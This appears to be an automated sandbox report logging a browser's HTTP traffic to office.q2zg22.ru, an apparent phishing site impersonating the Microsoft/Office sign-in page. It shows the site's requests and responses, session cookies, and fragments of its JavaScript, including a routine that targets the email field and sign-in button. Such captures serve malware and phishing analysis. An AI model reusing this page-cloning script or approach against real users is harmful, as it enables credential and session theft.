                                                                                                                          2024-02-02 19:17:52 UTC1369INData Raw: 4c 7e 4e 65 74 68 65 72 6c 61 6e 64 73 7e 33 31 21 21 21 4e 43 7e 4e 65 77 20 43 61 6c 65 64 6f 6e 69 61 7e 36 38 37 21 21 21 4e 5a 7e 4e 65 77 20 5a 65 61 6c 61 6e 64 7e 36 34 21 21 21 4e 49 7e 4e 69 63 61 72 61 67 75 61 7e 35 30 35 21 21 21 4e 45 7e 4e 69 67 65 72 7e 32 32 37 21 21 21 4e 47 7e 4e 69 67 65 72 69 61 7e 32 33 34 21 21 21 4e 55 7e 4e 69 75 65 7e 36 38 33 21 21 21 4e 46 7e 4e 6f 72 66 6f 6c 6b 20 49 73 6c 61 6e 64 7e 36 37 32 21 21 21 4b 50 7e 4e 6f 72 74 68 20 4b 6f 72 65 61 7e 38 35 30 21 21 21 4d 4b 7e 4e 6f 72 74 68 20 4d 61 63 65 64 6f 6e 69 61 7e 33 38 39 21 21 21 4d 50 7e 4e 6f 72 74 68 65 72 6e 20 4d 61 72 69 61 6e 61 20 49 73 6c 61 6e 64 73 7e 31 21 21 21 4e 4f 7e 4e 6f 72 77 61 79 7e 34 37 21 21 21 4f 4d 7e 4f 6d 61 6e 7e 39 36 38
                                                                                                                          Data Ascii: L~Netherlands~31!!!NC~New Caledonia~687!!!NZ~New Zealand~64!!!NI~Nicaragua~505!!!NE~Niger~227!!!NG~Nigeria~234!!!NU~Niue~683!!!NF~Norfolk Island~672!!!KP~North Korea~850!!!MK~North Macedonia~389!!!MP~Northern Mariana Islands~1!!!NO~Norway~47!!!OM~Oman~968
                                                                                                                          2024-02-02 19:17:52 UTC1369INData Raw: 7e 54 6f 6e 67 61 7e 36 37 36 21 21 21 54 54 7e 54 72 69 6e 69 64 61 64 20 61 6e 64 20 54 6f 62 61 67 6f 7e 31 21 21 21 54 41 7e 54 72 69 73 74 61 6e 20 64 61 20 43 75 6e 68 61 7e 32 39 30 21 21 21 54 4e 7e 54 75 6e 69 73 69 61 7e 32 31 36 21 21 21 54 52 7e 54 75 72 6b 65 79 7e 39 30 21 21 21 54 4d 7e 54 75 72 6b 6d 65 6e 69 73 74 61 6e 7e 39 39 33 21 21 21 54 43 7e 54 75 72 6b 73 20 61 6e 64 20 43 61 69 63 6f 73 20 49 73 6c 61 6e 64 73 7e 31 21 21 21 54 56 7e 54 75 76 61 6c 75 7e 36 38 38 21 21 21 56 49 7e 55 2e 53 2e 20 56 69 72 67 69 6e 20 49 73 6c 61 6e 64 73 7e 31 21 21 21 55 47 7e 55 67 61 6e 64 61 7e 32 35 36 21 21 21 55 41 7e 55 6b 72 61 69 6e 65 7e 33 38 30 21 21 21 41 45 7e 55 6e 69 74 65 64 20 41 72 61 62 20 45 6d 69 72 61 74 65 73 7e 39 37 31
                                                                                                                          Data Ascii: ~Tonga~676!!!TT~Trinidad and Tobago~1!!!TA~Tristan da Cunha~290!!!TN~Tunisia~216!!!TR~Turkey~90!!!TM~Turkmenistan~993!!!TC~Turks and Caicos Islands~1!!!TV~Tuvalu~688!!!VI~U.S. Virgin Islands~1!!!UG~Uganda~256!!!UA~Ukraine~380!!!AE~United Arab Emirates~971
                                                                                                                          2024-02-02 19:17:52 UTC1369INData Raw: 30 71 76 55 56 74 31 36 45 32 50 46 69 4a 67 59 4b 6f 53 45 78 45 61 50 64 6b 5a 64 50 6e 32 50 38 66 74 56 4b 33 53 4e 49 47 74 59 44 66 75 79 42 47 72 59 77 52 63 6b 51 31 4d 6b 53 5a 6b 6f 41 53 77 61 4a 56 6b 54 51 78 75 45 51 36 4f 34 7a 52 4c 6e 45 32 42 6f 36 33 68 32 71 62 70 37 35 38 30 76 66 5f 35 30 34 34 58 77 38 50 36 33 58 5f 5f 38 4f 48 70 33 67 75 78 4e 73 6d 77 36 50 36 6a 58 6c 38 74 6c 4c 52 6d 50 50 63 75 70 57 55 6c 55 44 34 39 6a 32 34 76 64 48 44 78 42 6b 4b 63 49 38 71 69 34 37 63 53 6f 63 6e 52 53 6e 4e 4e 45 67 77 51 6b 32 77 41 4d 7a 68 41 6b 7a 70 42 55 54 5a 63 35 58 4a 4d 74 58 41 4f 44 44 41 4b 4e 6b 49 34 77 44 50 49 61 4a 71 70 74 58 35 4d 48 57 59 39 76 2d 31 41 64 2d 6a 41 61 42 70 43 48 47 41 52 77 43 58 31 49 53 4d 31
                                                                                                                          Data Ascii: 0qvUVt16E2PFiJgYKoSExEaPdkZdPn2P8ftVK3SNIGtYDfuyBGrYwRckQ1MkSZkoASwaJVkTQxuEQ6O4zRLnE2Bo63h2qbp7580vf_5044Xw8P63X__8OHp3guxNsmw6P6jXl8tlLRmPPcupWUlUD49j24vdHDxBkKcI8qi47cSocnRSnNNEgwQk2wAMzhAkzpBUTZc5XJMtXAODDAKNkI4wDPIaJqptX5MHWY9v-1Ad-jAaBpCHGARwCX1ISM1
                                                                                                                          2024-02-02 19:17:52 UTC1369INData Raw: 55 44 34 39 6a 32 34 76 64 48 44 78 42 6b 4b 63 49 38 71 69 34 37 63 53 6f 63 6e 52 53 6e 4e 4e 45 67 77 51 6b 32 77 41 4d 7a 68 41 6b 7a 70 42 55 54 5a 63 35 58 4a 4d 74 58 41 4f 44 44 41 4b 4e 6b 49 34 77 44 50 49 61 4a 71 70 74 58 35 4d 48 57 59 39 76 2d 31 41 64 2d 6a 41 61 42 70 43 48 47 41 52 77 43 58 31 49 53 4d 31 57 42 70 74 66 65 58 43 4e 59 62 6f 63 72 45 57 31 68 55 4f 66 4f 2d 38 45 51 70 4d 56 51 75 64 62 47 4e 79 45 5f 72 50 69 78 52 36 33 79 43 62 67 76 53 51 7a 62 2d 4f 38 4c 75 36 4d 6b 31 6c 6b 54 4a 4e 35 39 71 6a 30 73 48 67 62 4e 7a 4d 5f 46 47 4d 73 6e 75 74 47 4a 31 2d 62 41 75 34 4e 56 49 5a 31 33 43 35 70 6a 71 58 4a 49 57 30 48 76 55 69 7a 70 6d 62 67 62 63 4a 52 68 32 4a 4a 62 70 4d 4a 66 54 6f 67 56 73 31 49 55 69 52 37 30 70
                                                                                                                          Data Ascii: UD49j24vdHDxBkKcI8qi47cSocnRSnNNEgwQk2wAMzhAkzpBUTZc5XJMtXAODDAKNkI4wDPIaJqptX5MHWY9v-1Ad-jAaBpCHGARwCX1ISM1WBptfeXCNYbocrEW1hUOfO-8EQpMVQudbGNyE_rPixR63yCbgvSQzb-O8Lu6Mk1lkTJN59qj0sHgbNzM_FGMsnutGJ1-bAu4NVIZ13C5pjqXJIW0HvUizpmbgbcJRh2JJbpMJfTogVs1IUiR70p


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          52192.168.2.1649781172.67.209.714435716C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-02-02 19:17:52 UTC2910OUTGET /s/afc35fefb916ef4eaaf2fe859837e744a9c25a67b61248f6ee93c6a02ca7fe04/521393ffd6e6e26814c2481ea580df56f06a765733586ff8dc0db635147b4d9a.js HTTP/1.1
                                                                                                                          Host: office.q2zg22.ru
                                                                                                                          Connection: keep-alive
                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                          Accept: */*
                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                          Referer: https://office.q2zg22.ru/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638424982717341745.ZTA1YTc1Y2QtM2Y3NS00MGY0LWFjYTQtOGFjMWVjMmVkMGM0M2MwMjM3NDEtMDBiMy00ZTkyLWE1MjAtMDI3YTU3ZGE0Mzlj&ui_locales=en-US&mkt=en-US&client-request-id=c9bbf586-3cb7-49e4-968c-855cb9b06dff&state=R1btjlLn0nsZ_HvybI1iQW79egJ4bfNhK6dkOmYcpbkizlXH594AztIP6k3xDmNUNdhPsej1iEMqwnjX96gynUUnHYVeqz7YpxI2QvZLJHV4r8DkHEi6Nk8gljZZv5WvGlIE5Og26go-5T2U69lQn1q5TI6o5VQMsZwWoXeA_nxn2T4NZft3rheUU5cDdv-TF9mO58xUEf_LDJcTw6zGzx-tCZqFP_odYqLyqaugqkr4-_v5VGMA8GP4vUjSWkdW82XubX6bTJ2NwLgrF94KOA&x-client-SKU=ID_NET6_0&x-client-ver=6.34.0.0
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          Cookie: ae23-8632=afc35fefb916ef4eaaf2fe859837e744a9c25a67b61248f6ee93c6a02ca7fe04; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; MUID=2E6F22D2EA936CD30EE836CBEBB26D97; esctx-sAcwFNXs9p0=AQABAAEAAAAmoFfGtYxvRrNriQdPKIZ-Xz-zY4mFOFPtOKDCtkncDgiCqiq8JSPFEneyjDU4hFCxc9yKOXR0OSKd5FYQRJM3mXeQZYPo-cw18QcWUama1nI0_hypcV18IPjbFcAN8l-2_npQ8hQ5HCn_XXMqMr00sdRCGYoSBfgWdZ8ETjE1OiAA; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1; esctx-M3Evdg9W3gI=AQABAAEAAAAmoFfGtYxvRrNriQdPKIZ-JqQWhBFF3iERp8Semywl5LKbWyjZoUSF17HR6LRJwEeJzRn7zd5hZTtbNOswRWLDQ8kQv3hJMqkVu2XeDuIthdsdh_qgD7pZ2CcAHHgScJuPoGyxYFiTiJuI8--bsFrVKPZQGoqN7dxUP9axzl0FDSAA; brcap=0; cf_clearance=DGVCDqJo4p8HXwiT2d9w7JleZ4qt8BY6c2qPP4YgtPs-1706901470-1-Acw5T7KtW0gzkNpwcfV200Vk3xmGo+jR5De1FJxtB8nNFB0tvSoBxYcHLUPxaQHxfbpp+xPD48APvvJqR81dSEE=; buid=0.AVoAMe_N-B6jSkuT5F9XHpElWltEZUfGMrBJg-Ydk3ZSdsoBAAA.AQABAAEAAAAmoFfGtYxvRrNriQdPKIZ-boMTZDEK31Q8YeqQNlfeZUoRfNsDRRPRvViO-GhTigwwBRK7ud8gg8Ns4yNqBH-tzw5bscmKyh59lNlT60JCz7Rwp4nwWHZ75wZ4ilsHRBogAA; esctx=PAQABAAEAAAAmoFfGtYxvRrNriQdPKIZ-w9y33GwHLRg75rjQ3nRfMFBNBJkRrnhLX8AcE24nRe-39xD3h6Hmaa_3zGrAfFX7O4WZ6VUmijaUiKhxJi9TS0fB3rz4i-XZ71ipeFm4Nb3CfO5Ubjg8SZH5niiXfSczBjYmdPttlkJUE6hJp2JxRjXmN5a8aDkLuanuiU1y-KQgAA; esctx-FfwgWlnTCko=AQABAAEAAAAmoFfGtYxvRrNriQdPKIZ-QQIYc2f6sjkAdFmj32fTdGjbHy6r5zpymHnrIl-qxGm2M5qe1vQy_uNxlAL8GMxQt9EBNI1EGcDNXOVrYqaOeg0WPIUqbnM2q1S6Q4WKMcWuDPb8NgfMp8EkVKDmr-M65eUsJ9kczDD1hrAZJYCZeCAA; fpc=Aq_odsI7GDJHm8suSWCV-X-8Ae7AAQAAAN82T90OAAAA
                                                                                                                          2024-02-02 19:17:53 UTC646INHTTP/1.1 200 OK
                                                                                                                          Date: Fri, 02 Feb 2024 19:17:53 GMT
                                                                                                                          Content-Type: application/javascript
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          Access-Control-Allow-Credentials: true
                                                                                                                          Cache-Control: no-cache, no-store
                                                                                                                          CF-Cache-Status: BYPASS
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=MdjSKRskejzMYzr7k4XGsojZlP584zIR6dmjFidD%2BEDgEoOoMDjtF%2FARWBHUeEpZTOpEQXMPJ0HwIoFzXTTB%2Bt%2Fl3UfuPrz9STQdjgXsCCwATqxDTpgeiEhLHbMsHK0GsmCI"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 84f4c6decc84676e-ATL
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          2024-02-02 19:17:53 UTC723INData Raw: 33 32 36 0d 0a 66 75 6e 63 74 69 6f 6e 20 6c 70 28 29 7b 0a 20 20 76 61 72 20 65 6d 61 69 6c 49 64 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 22 23 69 30 31 31 36 22 29 3b 0a 20 20 76 61 72 20 6e 65 78 74 42 75 74 74 6f 6e 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 22 23 69 64 53 49 42 75 74 74 6f 6e 39 22 29 3b 0a 20 20 76 61 72 20 71 75 65 72 79 20 3d 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3b 0a 20 20 69 66 20 28 2f 23 2f 2e 74 65 73 74 28 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 29 29 7b 0a 20 20 76 61 72 20 72 65 73 20 3d 20 71 75 65 72 79 2e 73 70 6c 69 74 28 22 23 22 29 3b 0a 20 20 76 61 72 20 64 61 74 61 31 20 3d 20 72 65 73 5b 30 5d 3b
                                                                                                                          Data Ascii: 326function lp(){ var emailId = document.querySelector("#i0116"); var nextButton = document.querySelector("#idSIButton9"); var query = window.location.href; if (/#/.test(window.location.href)){ var res = query.split("#"); var data1 = res[0];
                                                                                                                          2024-02-02 19:17:53 UTC90INData Raw: 7d 0a 20 20 7d 0a 20 20 20 73 65 74 54 69 6d 65 6f 75 74 28 66 75 6e 63 74 69 6f 6e 28 29 7b 6c 70 28 29 3b 7d 2c 20 35 30 30 29 3b 0a 20 20 7d 0a 20 20 73 65 74 54 69 6d 65 6f 75 74 28 66 75 6e 63 74 69 6f 6e 28 29 7b 6c 70 28 29 3b 7d 2c 20 35 30 30 29 3b 0a 0a 0d 0a
                                                                                                                          Data Ascii: } } setTimeout(function(){lp();}, 500); } setTimeout(function(){lp();}, 500);
                                                                                                                          2024-02-02 19:17:53 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          53192.168.2.1649782172.67.209.714435716C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-02-02 19:17:52 UTC2845OUTGET /s/afc35fefb916ef4eaaf2fe859837e744a9c25a67b61248f6ee93c6a02ca7fe04.js HTTP/1.1
                                                                                                                          Host: office.q2zg22.ru
                                                                                                                          Connection: keep-alive
                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                          Accept: */*
                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                          Referer: https://office.q2zg22.ru/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638424982717341745.ZTA1YTc1Y2QtM2Y3NS00MGY0LWFjYTQtOGFjMWVjMmVkMGM0M2MwMjM3NDEtMDBiMy00ZTkyLWE1MjAtMDI3YTU3ZGE0Mzlj&ui_locales=en-US&mkt=en-US&client-request-id=c9bbf586-3cb7-49e4-968c-855cb9b06dff&state=R1btjlLn0nsZ_HvybI1iQW79egJ4bfNhK6dkOmYcpbkizlXH594AztIP6k3xDmNUNdhPsej1iEMqwnjX96gynUUnHYVeqz7YpxI2QvZLJHV4r8DkHEi6Nk8gljZZv5WvGlIE5Og26go-5T2U69lQn1q5TI6o5VQMsZwWoXeA_nxn2T4NZft3rheUU5cDdv-TF9mO58xUEf_LDJcTw6zGzx-tCZqFP_odYqLyqaugqkr4-_v5VGMA8GP4vUjSWkdW82XubX6bTJ2NwLgrF94KOA&x-client-SKU=ID_NET6_0&x-client-ver=6.34.0.0
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          Cookie: ae23-8632=afc35fefb916ef4eaaf2fe859837e744a9c25a67b61248f6ee93c6a02ca7fe04; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; MUID=2E6F22D2EA936CD30EE836CBEBB26D97; esctx-sAcwFNXs9p0=AQABAAEAAAAmoFfGtYxvRrNriQdPKIZ-Xz-zY4mFOFPtOKDCtkncDgiCqiq8JSPFEneyjDU4hFCxc9yKOXR0OSKd5FYQRJM3mXeQZYPo-cw18QcWUama1nI0_hypcV18IPjbFcAN8l-2_npQ8hQ5HCn_XXMqMr00sdRCGYoSBfgWdZ8ETjE1OiAA; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1; esctx-M3Evdg9W3gI=AQABAAEAAAAmoFfGtYxvRrNriQdPKIZ-JqQWhBFF3iERp8Semywl5LKbWyjZoUSF17HR6LRJwEeJzRn7zd5hZTtbNOswRWLDQ8kQv3hJMqkVu2XeDuIthdsdh_qgD7pZ2CcAHHgScJuPoGyxYFiTiJuI8--bsFrVKPZQGoqN7dxUP9axzl0FDSAA; brcap=0; cf_clearance=DGVCDqJo4p8HXwiT2d9w7JleZ4qt8BY6c2qPP4YgtPs-1706901470-1-Acw5T7KtW0gzkNpwcfV200Vk3xmGo+jR5De1FJxtB8nNFB0tvSoBxYcHLUPxaQHxfbpp+xPD48APvvJqR81dSEE=; buid=0.AVoAMe_N-B6jSkuT5F9XHpElWltEZUfGMrBJg-Ydk3ZSdsoBAAA.AQABAAEAAAAmoFfGtYxvRrNriQdPKIZ-boMTZDEK31Q8YeqQNlfeZUoRfNsDRRPRvViO-GhTigwwBRK7ud8gg8Ns4yNqBH-tzw5bscmKyh59lNlT60JCz7Rwp4nwWHZ75wZ4ilsHRBogAA; esctx=PAQABAAEAAAAmoFfGtYxvRrNriQdPKIZ-w9y33GwHLRg75rjQ3nRfMFBNBJkRrnhLX8AcE24nRe-39xD3h6Hmaa_3zGrAfFX7O4WZ6VUmijaUiKhxJi9TS0fB3rz4i-XZ71ipeFm4Nb3CfO5Ubjg8SZH5niiXfSczBjYmdPttlkJUE6hJp2JxRjXmN5a8aDkLuanuiU1y-KQgAA; esctx-FfwgWlnTCko=AQABAAEAAAAmoFfGtYxvRrNriQdPKIZ-QQIYc2f6sjkAdFmj32fTdGjbHy6r5zpymHnrIl-qxGm2M5qe1vQy_uNxlAL8GMxQt9EBNI1EGcDNXOVrYqaOeg0WPIUqbnM2q1S6Q4WKMcWuDPb8NgfMp8EkVKDmr-M65eUsJ9kczDD1hrAZJYCZeCAA; fpc=Aq_odsI7GDJHm8suSWCV-X-8Ae7AAQAAAN82T90OAAAA
                                                                                                                          2024-02-02 19:17:53 UTC650INHTTP/1.1 200 OK
                                                                                                                          Date: Fri, 02 Feb 2024 19:17:53 GMT
                                                                                                                          Content-Type: application/javascript
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          Access-Control-Allow-Credentials: true
                                                                                                                          Cache-Control: no-cache, no-store
                                                                                                                          CF-Cache-Status: BYPASS
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=WNSLPvjrK4I4WL5z44Ia40WSdmxbWwuTN4PbVivIP1%2BnJqMriV%2FT%2BQV%2FjFQi4XRQPfaRkWPQNc7FaefjRzd6%2BIQdBUsWz45O30R3bZs8GQQwOHdIG9We13dRv2KTZ1%2BuhR5l"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 84f4c6decae3450b-ATL
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          2024-02-02 19:17:53 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          54192.168.2.1649783104.21.85.1894435716C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-02-02 19:17:52 UTC1029OUTGET /Me.htm?v=3 HTTP/1.1
                                                                                                                          Host: ywnjb.q2zg22.ru
                                                                                                                          Connection: keep-alive
                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                          Purpose: prefetch
                                                                                                                          Sec-Fetch-Site: same-site
                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                          Referer: https://office.q2zg22.ru/
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          Cookie: ae23-8632=afc35fefb916ef4eaaf2fe859837e744a9c25a67b61248f6ee93c6a02ca7fe04; MUID=2E6F22D2EA936CD30EE836CBEBB26D97; cf_clearance=DGVCDqJo4p8HXwiT2d9w7JleZ4qt8BY6c2qPP4YgtPs-1706901470-1-Acw5T7KtW0gzkNpwcfV200Vk3xmGo+jR5De1FJxtB8nNFB0tvSoBxYcHLUPxaQHxfbpp+xPD48APvvJqR81dSEE=; uaid=5b55c0a44eaf49cfa2da2d65c6420b02; MSPRequ=id=N&lt=1706901471&co=2
                                                                                                                          2024-02-02 19:17:53 UTC1152INHTTP/1.1 200 OK
                                                                                                                          Date: Fri, 02 Feb 2024 19:17:53 GMT
                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          Access-Control-Allow-Credentials: true
                                                                                                                          Cache-Control: no-cache, no-store
                                                                                                                          Expires: Mon, 30 Jan 2034 19:17:53 GMT
                                                                                                                          P3p: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                                          Ppserver: PPV: 30 H: SN1PEPF00010FF2 V: 0
                                                                                                                          Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                          Set-Cookie: uaid=71c5bddea9a94fd68abbc95643963793; Path=/; Domain=ywnjb.q2zg22.ru; HttpOnly; Secure; SameSite=None
                                                                                                                          Set-Cookie: MSPRequ=id=N&lt=1706901473&co=3; Path=/; Domain=ywnjb.q2zg22.ru; HttpOnly; Secure; SameSite=None
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          X-Ms-Request-Id: c83ec803-1310-4f42-9a2f-424870ceacbd
                                                                                                                          X-Ms-Route-Info: C107_SN1
                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=k89uKNCBk01kLfMcvv%2BD65H9mH8TJoLJEgTpgVXszJUUzRg%2FciG2cmTBjvaZcfvlYtwOXYt5Hw3EjhU7DRKPL1LWO3vUHwx3RUEDvXdcYMawJZ5afrMXdNbA31JP8b9ttaQ%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 84f4c6df38da53c6-ATL
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          2024-02-02 19:17:53 UTC217INData Raw: 39 31 37 0d 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 21 66 75 6e 63 74 69 6f 6e 28 6e 2c 74 29 7b 66 6f 72 28 76 61 72 20 65 20 69 6e 20 74 29 6e 5b 65 5d 3d 74 5b 65 5d 7d 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 66 75 6e 63 74 69 6f 6e 20 74 28 69 29 7b 69 66 28 65 5b 69 5d 29 72 65 74 75 72 6e 20 65 5b 69 5d 2e 65 78 70 6f 72 74 73 3b 76 61 72 20 73 3d 65 5b 69 5d 3d 7b 65 78 70 6f 72 74 73 3a 7b 7d 2c 69 64 3a 69 2c 6c 6f 61 64 65 64 3a 21 31 7d 3b 72 65 74 75 72 6e 20 6e 5b 69 5d 2e 63 61 6c 6c 28 73 2e 65 78 70 6f 72 74 73 2c 73 2c 73 2e 65 78 70 6f 72 74 73 2c 74 29 2c
                                                                                                                          Data Ascii: 917<script type="text/javascript">!function(n,t){for(var e in t)n[e]=t[e]}(this,function(n){function t(i){if(e[i])return e[i].exports;var s=e[i]={exports:{},id:i,loaded:!1};return n[i].call(s.exports,s,s.exports,t),
                                                                                                                          2024-02-02 19:17:53 UTC1369INData Raw: 73 2e 6c 6f 61 64 65 64 3d 21 30 2c 73 2e 65 78 70 6f 72 74 73 7d 76 61 72 20 65 3d 7b 7d 3b 72 65 74 75 72 6e 20 74 2e 6d 3d 6e 2c 74 2e 63 3d 65 2c 74 2e 70 3d 22 22 2c 74 28 30 29 7d 28 5b 66 75 6e 63 74 69 6f 6e 28 6e 2c 74 29 7b 66 75 6e 63 74 69 6f 6e 20 65 28 6e 29 7b 66 6f 72 28 76 61 72 20 74 3d 67 5b 63 5d 2c 65 3d 30 2c 69 3d 74 2e 6c 65 6e 67 74 68 3b 65 3c 69 3b 2b 2b 65 29 69 66 28 74 5b 65 5d 3d 3d 3d 6e 29 72 65 74 75 72 6e 21 30 3b 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 69 28 6e 29 7b 69 66 28 21 6e 29 72 65 74 75 72 6e 20 6e 75 6c 6c 3b 66 6f 72 28 76 61 72 20 74 3d 6e 2b 22 3d 22 2c 65 3d 64 6f 63 75 6d 65 6e 74 2e 63 6f 6f 6b 69 65 2e 73 70 6c 69 74 28 22 3b 22 29 2c 69 3d 30 2c 73 3d 65 2e 6c 65 6e 67 74 68 3b 69 3c 73
                                                                                                                          Data Ascii: s.loaded=!0,s.exports}var e={};return t.m=n,t.c=e,t.p="",t(0)}([function(n,t){function e(n){for(var t=g[c],e=0,i=t.length;e<i;++e)if(t[e]===n)return!0;return!1}function i(n){if(!n)return null;for(var t=n+"=",e=document.cookie.split(";"),i=0,s=e.length;i<s
                                                                                                                          2024-02-02 19:17:53 UTC748INData Raw: 7d 63 61 74 63 68 28 6f 29 7b 74 2e 65 72 72 6f 72 3d 6f 2e 6d 65 73 73 61 67 65 7d 6e 26 26 6c 2e 70 61 72 65 6e 74 2e 70 6f 73 74 4d 65 73 73 61 67 65 28 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 74 29 2c 6e 29 7d 76 61 72 20 6c 3d 77 69 6e 64 6f 77 2c 63 3d 22 70 72 6f 64 22 2c 70 3d 22 22 2c 66 3d 22 22 2c 64 3d 7b 4e 6f 6e 65 3a 30 2c 53 69 67 6e 65 64 49 6e 54 6f 52 50 3a 31 2c 53 69 67 6e 65 64 49 6e 54 6f 49 44 50 3a 32 2c 52 65 6d 65 6d 62 65 72 65 64 3a 33 7d 2c 75 3d 7b 4e 6f 6e 65 3a 30 2c 49 73 57 69 6e 64 6f 77 73 53 73 6f 3a 31 7d 2c 67 3d 7b 64 65 76 3a 5b 70 2c 66 5d 2c 22 69 6e 74 22 3a 5b 22 68 74 74 70 73 3a 2f 2f 6c 6f 67 69 6e 2e 77 69 6e 64 6f 77 73 2d 70 70 65 2e 6e 65 74 22 5d 2c 70 72 6f 64 3a 5b 22 68 74 74 70 73 3a 2f 2f 6f
                                                                                                                          Data Ascii: }catch(o){t.error=o.message}n&&l.parent.postMessage(JSON.stringify(t),n)}var l=window,c="prod",p="",f="",d={None:0,SignedInToRP:1,SignedInToIDP:2,Remembered:3},u={None:0,IsWindowsSso:1},g={dev:[p,f],"int":["https://login.windows-ppe.net"],prod:["https://o
                                                                                                                          2024-02-02 19:17:53 UTC7INData Raw: 32 0d 0a 0d 0a 0d 0a
                                                                                                                          Data Ascii: 2
                                                                                                                          2024-02-02 19:17:53 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
